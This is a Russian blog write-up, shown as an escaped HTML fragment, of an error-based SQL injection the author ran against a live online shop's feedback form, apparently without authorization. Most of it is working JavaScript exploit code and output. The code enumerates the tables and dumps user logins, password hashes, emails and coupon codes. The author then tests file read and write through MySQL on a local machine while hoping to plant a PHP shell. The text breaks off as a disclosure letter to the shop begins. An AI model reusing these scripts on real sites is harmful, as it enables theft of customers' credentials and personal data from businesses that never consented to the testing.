$.getScript('https:\/\/raw.githubusercontent.com\/caolan\/async\/master\/lib\/async.js');  (function() {     var ans_start = " '~", \/\/ \u041d\u0430\u0447\u0430\u043b\u043e \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0432 \u043e\u0442\u0432\u0435\u0442\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430         ans_stop = "' SQL=", \/\/ \u041a\u043e\u043d\u0435\u0446 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438         lim = 20,         start_from = 0;          \/\/ \u041a\u0443\u0447\u0430 \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 AJAX-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432     async.times(lim, function(i, next) {         var injection = "' or updatexml(0, concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit "+ (start_from + i) +", 1)), 0) or '";         $.ajax({             url: '\/cli\/feedback.php',             method: 'POST',             data: $.param({                 data_email: 'undefined',                 data_email_body: 'undefined',                 data_email_subject: '\u041e\u0431\u0440\u0430\u0442\u043d\u0430\u044f \u0441\u0432\u044f\u0437\u044c - A B',                 type: 'feedback',                 name: 'Test',                 mail: 'test@mailinator.com',                 phone: '',                 feedbacktext: injection,                 else: '',                 recipient: 'A@B.ru',                 btn: ''             }),             success: function(resp) {                 next(null, resp.substring(resp.indexOf(ans_start) + ans_start.length, resp.indexOf(ans_stop)));             },             error: function(jqXHR, textStatus) {                 next(textStatus);             }         });     }, function(err, results) {         \/\/ \u0412\u0441\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u0432 \u043a\u043e\u043d\u0446\u0435 \u043e\u0434\u043d\u0438\u043c \u0441\u043a\u043e\u043f\u043e\u043c         if (err) return console.error(err);         window.INJ_RESULTS = results; \/\/ \u041e\u043f\u044b\u0442\u043d\u044b\u043c \u043f\u0443\u0442\u0451\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043b, \u0447\u0442\u043e \u0438\u0437 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u0443\u0434\u043e\u0431\u043d\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043b\u0443\u0447\u0448\u0435 \u043f\u0440\u0438\u0432\u044f\u0437\u0430\u0442\u044c \u0438\u0445 \u043a \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u0433\u043b\u043e\u0431\u0430\u043b\u044c\u043d\u043e\u0439 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u0434\u043b\u044f \u043f\u043e\u0441\u0442-\u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438         console.log(results.join('\\n')); \/\/ \u0412\u044b\u0432\u043e\u0434 \u043e\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u043e\u0439 \u0432\u043e \u0438\u0437\u0431\u0435\u0436\u0430\u043d\u0438\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0441 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c     }); })(); <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u0435\u0440\u0432\u044b\u0445 20 \u0442\u0430\u0431\u043b\u0438\u0446, \u043d\u043e \u043f\u043e\u043d\u044f\u043b, \u0447\u0442\u043e \u043e\u0434\u043d\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u043f\u043e\u0441\u044b\u043b\u0430\u0442\u044c \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u043d\u0435\u0445\u043e\u0440\u043e\u0448\u043e (\u043d\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0438\u0437 \u043d\u0438\u0445 \u0441\u0435\u0440\u0432\u0435\u0440 \u043e\u0442\u0432\u0435\u0447\u0430\u043b \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0438 20 \u0441\u0435\u043a\u0443\u043d\u0434). \u0420\u0435\u0448\u0438\u043b, \u0447\u0442\u043e \u043d\u0435 \u0441\u0442\u043e\u0438\u0442 \u0443\u0433\u0440\u043e\u0436\u0430\u0442\u044c \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 \u0438 \u043f\u043e\u043c\u0435\u043d\u044f\u043b \u0444\u0443\u043d\u043a\u0446\u0438\u044e async.times \u043d\u0430 async.timesSeries, \u0447\u0442\u043e\u0431\u044b \u043a\u0430\u0436\u0434\u044b\u0439 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439. \u041f\u043e\u043c\u0435\u043d\u044f\u043b \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 lim \u0441 20 \u043d\u0430 200 \u0438 \u0443\u0448\u0451\u043b \u0437\u0430 \u0447\u0430\u0448\u0435\u0447\u043a\u043e\u0439 \u0447\u0430\u044f. \u0410 \u043a\u043e\u0433\u0434\u0430 \u0432\u0435\u0440\u043d\u0443\u043b\u0441\u044f, \u0432 \u043c\u043e\u0451\u043c \u0440\u0430\u0441\u043f\u043e\u0440\u044f\u0436\u0435\u043d\u0438\u0438 \u0431\u044b\u043b <\/p>\n
\u0441\u043f\u0438\u0441\u043e\u043a \u0432\u0441\u0435\u0445 \u0442\u0430\u0431\u043b\u0438\u0446<\/b><\/p>\n
\n
aa:cart aa:category <...> aa:aabb_finder_links aa:aabb_finder_links_terms0 aa:aabb_finder_links_terms1 <...> aa:aabb_jcomments_votes aa:aabb_jsecurelog aa:aabb_jshopping_addons <...> aa:aabb_jshopping_coupons <...> aa:aabb_jshopping_shipping_meth <...> aa:aabb_jshopping_usergroups aa:aabb_jshopping_users <...> aa:aabb_usergroups aa:aabb_users aa:aabb_viewlevels aa:aabb_weblinks aa:aabb_wf_profiles aa:aabb_xmap_items aa:aabb_xmap_sitemap aa:modules aa:orders aa:oshibka aa:params aa:reviews aa:slideshow aa:users <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u0418\u0437 \u044d\u0442\u043e\u0433\u043e \u0441\u043f\u0438\u0441\u043a\u0430 \u0441\u0442\u0430\u043b\u043e \u043f\u043e\u043d\u044f\u0442\u043d\u043e \u0434\u0432\u0430 \u0444\u0430\u043a\u0442\u0430: \u0441\u0442\u043e\u0438\u0442 Joomla \u0438 \u043e\u0431\u044a\u0435\u043c \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d 32-\u043c\u044f \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432. \u041f\u0440\u0438\u0447\u0451\u043c \u043f\u0435\u0440\u0432\u044b\u0445 \u0438\u0437 \u043d\u0438\u0445 ("~") \u0443\u0431\u0440\u0430\u0442\u044c \u043c\u044b \u043d\u0435 \u043c\u043e\u0436\u0435\u043c, \u0437\u043d\u0430\u0447\u0438\u0442 \u0443 \u043d\u0430\u0441 \u0432\u0441\u0435\u0433\u043e 31 \u0441\u0438\u043c\u0432\u043e\u043b. \u0427\u0442\u043e \u0436, \u043d\u0435 \u0442\u0430\u043a \u0443\u0436 \u043c\u0430\u043b\u043e. \u0411\u044b\u043b\u043e \u043c\u043d\u043e\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u0442\u0430\u0431\u043b\u0438\u0446 (3 \u0442\u0430\u0431\u043b\u0438\u0446\u044b *users \u0438 aabb_jshopping_coupons). \u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u0442\u0430\u0431\u043b\u0438\u0446\u044b users, \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044f \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e injection:  <\/p>\n
' or updatexml(0, concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1)), 0) or ' <\/code><\/pre>\n
  <\/p>\n
id, login, password, email, tel, name, firma, active, date, role <\/code><\/pre>\n
  \u041f\u043e\u0442\u043e\u043c \u0435\u0451 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u0438 CONCAT_WS<\/a>:  <\/p>\n
' or updatexml(0, concat(0x7e,(SELECT CONCAT_WS(':',id,login,password) FROM users LIMIT 0,1)), 0) or ' <\/code><\/pre>\n
  \u041d\u043e \u043a\u0430\u0436\u0434\u0430\u044f \u0437\u0430\u043f\u0438\u0441\u044c \u043f\u043e\u043b\u0443\u0447\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u0438\u043d\u043d\u043e\u0439 \u0440\u043e\u0432\u043d\u043e \u0432 31 \u0441\u0438\u043c\u0432\u043e\u043b \u0438\u0437-\u0437\u0430 \u0438\u0437\u0431\u044b\u0442\u043a\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u043f\u0440\u0435\u043e\u0434\u043e\u043b\u0435\u0442\u044c \u044d\u0442\u043e \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u044f \u0440\u0435\u0448\u0438\u043b \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0435\u0439 SUBSTRING<\/a>, \u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043d\u043e\u0432\u043e\u0439 \u043f\u043e\u0440\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u0442\u044c \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u044e. \u0412 \u0438\u0442\u043e\u0433\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0441\u044f   <\/p>\n
\u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 \u043a\u043e\u043d\u0441\u0442\u0440\u0443\u043a\u0442\u043e\u0440 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 `ajax93t411`.<\/b><\/p>\n
\n
$.getScript('https:\/\/raw.githubusercontent.com\/caolan\/async\/master\/lib\/async.js');  \/\/ \u041a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u044b, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u0442\u043e\u043c \u043b\u0435\u0433\u0447\u0435 \u0431\u044b\u043b\u043e var ANS_START = " '~",     ANS_STOP = "' SQL=",     ANS_ERR = "Er",     ANS_LIM = 31;  \/\/ \u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \/\/ start_from \u0438 lim \u0434\u043b\u044f \u043f\u0443\u0442\u0435\u0448\u0435\u0441\u0442\u0432\u0438\u044f \u043f\u043e \u0441\u0442\u0440\u043e\u0447\u043a\u0430\u043c \u0442\u0430\u0431\u043b\u0438\u0446\u044b \/\/ construct_req - \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u044e\u0449\u0430\u044f \u0441\u0442\u0440\u043e\u043a\u0443 \u0441 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u043c function ajax93t411(start_from, lim, construct_req) {     \/\/ \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043d\u044f \u0432\u0441\u044f\u043a\u0438\u0439 \u0441\u043b\u0443\u0447\u0430\u0439     start_from = start_from || 0;     lim = lim || 1;      \/\/ \u0417\u0430\u043f\u0440\u043e\u0441 \u043a \u0441\u0435\u0440\u0432\u0435\u0440\u0443. i, offset - \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 construct_req     function req(i, offset, callback) {         $.ajax({             url: '\/cli\/feedback.php',             method: 'POST',             data: $.param({                 data_email: 'undefined',                 data_email_body: 'undefined',                 data_email_subject: '\u041e\u0431\u0440\u0430\u0442\u043d\u0430\u044f \u0441\u0432\u044f\u0437\u044c - A B',                 type: 'feedback',                 name: 'Test',                 mail: 'test@mailinator.com',                 phone: '',                 feedbacktext: construct_req(start_from, i, offset),                 else: '',                 recipient: 'A@B.ru',                 btn: ''             }),             success: function(resp) {                 callback(null, resp.substring(resp.indexOf(ANS_START) + ANS_START.length, resp.indexOf(ANS_STOP)));             },             error: function(jqXHR, textStatus) {                 callback(textStatus);             }         });     }      \/\/ \u0415\u0441\u043b\u0438 \u0434\u043b\u0438\u043d\u0430 \u043e\u0442\u0432\u0435\u0442\u0430 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0432\u043d\u0430 31, \u0442\u043e \u0434\u0435\u043b\u0430\u0435\u043c \u0441\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0438     \/\/ \u0435\u0449\u0451 \u043e\u0434\u0438\u043d \u0437\u0430\u043f\u0440\u043e\u0441, \u0441\u0443\u043c\u043c\u0438\u0440\u0443\u044f \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b     function constructReq(i, full_answer, offset, next) {         req(i, offset, function(err, answer) {             if (err) return next(err, full_answer);              full_answer += answer;             if (answer.length == ANS_LIM) {                 constructReq(i, full_answer, offset + ANS_LIM, next);             } else {                 next(null, full_answer);             }         });     }          \/\/ \u041f\u0443\u0442\u0435\u0448\u0435\u0441\u0442\u0432\u0443\u0435\u043c \u043f\u043e \u0437\u0430\u0434\u0430\u043d\u043d\u043e\u043c\u0443 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u0441\u0442\u0440\u043e\u043a \u0442\u0430\u0431\u043b\u0438\u0446\u044b     async.timesSeries(lim, function(i, next) {         constructReq(i, '', 1, next);     }, function(err, results) {         if (err) return console.error(err);         window.INJ_RESULTS = results;         console.log(results.join(', '));     }); } <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u041f\u043e \u0442\u0430\u043a\u043e\u043c\u0443 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0443 \u0434\u0430\u043d\u043d\u044b\u0435 \u0431\u0443\u0434\u0443\u0442 \u0432\u044b\u0442\u044f\u0433\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0435\u0449\u0451 \u0434\u043e\u043b\u044c\u0448\u0435, \u0437\u0430\u0442\u043e \u0446\u0435\u043b\u0438\u043a\u043e\u043c \u0438 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e. \u0422\u0435\u043f\u0435\u0440\u044c \u043c\u043e\u0436\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u0441\u0430\u043c\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u043e\u0442 \u043e\u0431\u0449\u0435\u0439 \u043b\u043e\u0433\u0438\u043a\u0438:  <\/p>\n
function inj(start_from, i, offset) {     return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':',id,login,password,email), "+ offset +", "+ ANS_LIM +") FROM users LIMIT "+ (start_from + i) +",1)), 0) or '" } ajax93t411(0, 30, inj) <\/code><\/pre>\n
  \u0418 \u043f\u0435\u0440\u0432\u044b\u0435 30 \u0441\u0442\u0440\u043e\u043a \u0442\u0430\u0431\u043b\u0438\u0446\u044b users \u0432 \u043a\u043e\u043d\u0441\u043e\u043b\u0438 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430.   <\/p>\n
function inj(start_from, i, offset) {     return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':',username,email,password), "+ offset +", "+ ANS_LIM +") FROM aabb_users LIMIT "+ (start_from + i) +",1)), 0) or '" }  ajax93t411(0, 30, inj) <\/code><\/pre>\n
  \u0414\u0430\u043b\u0435\u0435 \u043e\u043f\u0438\u0448\u0443 \u043b\u0438\u0448\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u043c\u043e\u043c\u0435\u043d\u0442\u044b.
  \u041a\u0443\u043f\u043e\u043d\u044b, \u0432 \u0442.\u0447. \u0434\u043b\u044f \u0425\u0430\u0431\u0440\u0430 \u0438 \u0413\u0438\u043a\u0442\u0430\u0439\u043c\u0441, \u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u0440\u043e\u0441\u0440\u043e\u0447\u0435\u043d\u043d\u044b\u043c\u0438. \u0414\u0430 \u0438 \u0441\u0432\u043e\u044e \u0438\u0433\u0440\u0443\u0448\u043a\u0443 \u044f \u0443\u0436\u0435 \u043a\u0443\u043f\u0438\u043b.  <\/p>\n
function inj(start_from, i, offset) {     return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':',coupon_code,coupon_value,coupon_start_date,coupon_expire_date), "+ offset +", "+ ANS_LIM +") FROM aabb_jshopping_coupons LIMIT "+ (start_from + i) +",1)), 0) or '" }  ajax93t411(0, 30, inj) <\/code><\/pre>\n
  \u0412\u0441\u0435 \u0442\u0430\u0431\u043b\u0438\u0446\u044b \u0432 \u043f\u043e\u043b\u043d\u0443\u044e \u0434\u043b\u0438\u043d\u0443 \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0431\u0430\u0437 \u0434\u0430\u043d\u043d\u044b\u0445:  <\/p>\n
function inj(start_from, i, offset) {     return "' or updatexml(0, concat(0x7e,(SELECT SUBSTRING(concat_ws(':', table_schema, table_name), "+ offset +", "+ ANS_LIM +") FROM information_schema.tables LIMIT "+ (start_from + i) +", 1)), 0) or '" }  ajax93t411(62, 100, inj); \/\/ \u041f\u0435\u0440\u0432\u044b\u0435 62 - \u044d\u0442\u043e \u0441\u0430\u043c\u0430 information_schema ajax93t411(162, 100, inj); <\/code><\/pre>\n
  \u041a\u0430\u043a \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d A.B.ru \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 Joomla, \u043d\u043e \u0438 \u0442\u0430\u043a\u043e\u0439 \u0436\u0435 \u043c\u0430\u0433\u0430\u0437\u0438\u043d B.ru \u043d\u0430 \u043d\u0435\u0439 \u0436\u0435 \u0438 \u043d\u0430 \u0442\u043e\u043c \u0436\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u041d\u043e \u043f\u0435\u0440\u0441\u043f\u0435\u043a\u0442\u0438\u0432 \u043e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0435\u0449\u0451 \u043e\u0434\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430 \u044f \u043d\u0435 \u0443\u0432\u0438\u0434\u0435\u043b. \u0412 \u043a\u043e\u043d\u0446\u0435 \u043a\u043e\u043d\u0446\u043e\u0432, \u043c\u043e\u0435\u0439 \u0446\u0435\u043b\u044c\u044e \u043d\u0435 \u0431\u044b\u043b\u043e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043d\u0430\u0436\u0438\u0432\u044b. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0440\u0435\u0448\u0438\u043b, \u0447\u0442\u043e \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0445\u043e\u0440\u043e\u0448\u043e, \u043d\u043e\u2026<\/p>\n
  \u041c\u043e\u0436\u043d\u043e \u043b\u0438 \u0447\u0442\u043e-\u043d\u0438\u0431\u0443\u0434\u044c \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c?<\/b><\/p>\n
  \u041a\u0430\u043a \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u043d\u0435\u0442. \u0422\u0430\u043a \u043a\u0430\u043a \u043d\u0430\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0434\u0437\u0430\u043f\u0440\u043e\u0441\u044b<\/a>. \u0420\u0435\u0448\u0438\u043b, \u0447\u0442\u043e \u0441\u0442\u043e\u0438\u0442 \u0432\u0441\u0451 \u0436\u0435 \u043f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0443 \u0441 \u0444\u0430\u0439\u043b\u0430\u043c\u0438. \u041d\u043e \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043d\u0430\u0432\u0440\u0435\u0434\u0438\u0442\u044c \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0443 \u0441\u0432\u043e\u0438\u043c\u0438 \u043d\u0435\u043e\u0441\u0442\u043e\u0440\u043e\u0436\u043d\u044b\u043c\u0438 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f\u043c\u0438, \u043f\u0435\u0440\u0435\u043d\u0435\u0441\u0443 \u043f\u043e\u0432\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u0430 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443, \u0433\u0434\u0435 \u043f\u0440\u043e\u0432\u0451\u043b <\/p>\n
\u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u043f\u044b\u0442\u044b<\/b><\/p>\n
\u0421\u043e\u0437\u0434\u0430\u0451\u043c \u043f\u0440\u043e\u0441\u0442\u0435\u0439\u0448\u0443\u044e \u0442\u0430\u0431\u043b\u0438\u0446\u0443:  <\/p>\n
mysql> create database test; Query OK, 1 row affected (0,06 sec)  mysql> create table t(id int, msg text); Query OK, 0 rows affected (0,70 sec)  mysql> insert into t values (1, 'msg'); Query OK, 1 row affected (0,06 sec)  mysql> select * from t; +------+------+ | id   | msg  | +------+------+ |    1 | msg  | +------+------+ 1 row in set (0,00 sec) <\/code><\/pre>\n
  \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0438\u043c\u0438\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c SQL insert injection:  <\/p>\n
mysql> insert into t values (1, '' or updatexml(1, concat('~', version()), 0) or ''); ERROR 1105 (HY000): XPATH syntax error: '~5.6.25-0ubuntu0.15.04.1'  mysql> insert into t values (1, '' or updatexml(1, concat('~', '1234567890123456789012345678901234567890'), 0) or ''); ERROR 1105 (HY000): XPATH syntax error: '~1234567890123456789012345678901' <\/code><\/pre>\n
  \u0422\u043e \u0436\u0435 \u0441\u0430\u043c\u043e\u0435 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0432 32 \u0441\u0438\u043c\u0432\u043e\u043b\u0430.<\/p>\n
  \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0432\u044b\u0432\u043e\u0434 \u0432 \u0444\u0430\u0439\u043b:  <\/p>\n
mysql> select 1 from dual into outfile 'test.txt'; Query OK, 1 row affected (0,00 sec)  $ sudo ls -la \/var\/lib\/mysql\/test\/ \u0438\u0442\u043e\u0433\u043e 124 drwx------  2 mysql mysql  4096 \u0430\u0432\u0433.  11 18:07 . drwx------ 12 mysql mysql  4096 \u0430\u0432\u0433.  11 17:50 .. -rw-rw----  1 mysql mysql    65 \u0430\u0432\u0433.  11 17:50 db.opt -rw-rw-rw-  1 mysql mysql     2 \u0430\u0432\u0433.  11 18:07 test.txt -rw-rw----  1 mysql mysql  8584 \u0430\u0432\u0433.  11 17:52 t.frm -rw-rw----  1 mysql mysql 98304 \u0430\u0432\u0433.  11 17:52 t.ibd  mysql> insert into t values (1, '' or updatexml(1, concat('~', (select 1 from dual into outfile 'test.txt')), 0) or ''); ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile 'test.txt')), 0) or '')' at line 1 <\/code><\/pre>\n
  \u041e\u0436\u0438\u0434\u0430\u0435\u043c\u043e, \u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0441\u0442\u043e\u0438\u043b\u043e. \u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0447\u0442\u0435\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u0430. \u0422\u0430\u043a \u043e\u043d\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0432 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e\u043c \u0432\u0438\u0434\u0435:  <\/p>\n
mysql> LOAD DATA INFILE 'test.txt' into table t; Query OK, 1 row affected, 1 warning (0,08 sec) Records: 1  Deleted: 0  Skipped: 0  Warnings: 1  mysql> select * from t; +------+------+ | id   | msg  | +------+------+ |    1 | msg  | |    1 | NULL | +------+------+ 2 rows in set (0,00 sec) <\/code><\/pre>\n
  \u041d\u043e \u0432\u043d\u0443\u0442\u0440\u0438 INSERT INTO \u0442\u043e\u0436\u0435 \u043d\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442:  <\/p>\n
mysql> insert into t values (1, '' or updatexml(1, concat('~', (LOAD DATA INFILE 'test.txt' into table t)), 0) or ''); ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD DATA INFILE 'test.txt' into table t)), 0) or '')' at line 1 mysql> insert into t values (1, '' or updatexml(1, concat('~', (LOAD DATA INFILE 'test.txt')), 0) or ''); ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOAD DATA INFILE 'test.txt')), 0) or '')' at line 1 <\/code><\/pre>\n
  \u0412 \u043b\u044e\u0431\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435, \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043a \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0443, \u043f\u043e\u043b\u043d\u044b\u0435 \u043f\u0443\u0442\u0438 \u043a \u0441\u0430\u0439\u0442\u0443 \u043c\u043d\u0435 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b, \u0447\u0442\u043e\u0431\u044b, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0441\u043e\u0437\u0434\u0430\u0442\u044c PHP Shell.  <\/div>\n<\/div>\n
  \u041d\u0430\u043f\u0438\u0441\u0430\u043b \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d<\/b><\/p>\n
\u041f\u0438\u0441\u044c\u043c\u043e<\/b><\/p>\n
\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435.<\/p>\n
  \u0421\u043b\u0443\u0447\u0430\u0439\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b \u043e\u0448\u0438\u0431\u043a\u0443 \u043d\u0430 \u0432\u0430\u0448\u0435\u043c \u0441\u0430\u0439\u0442\u0435. 
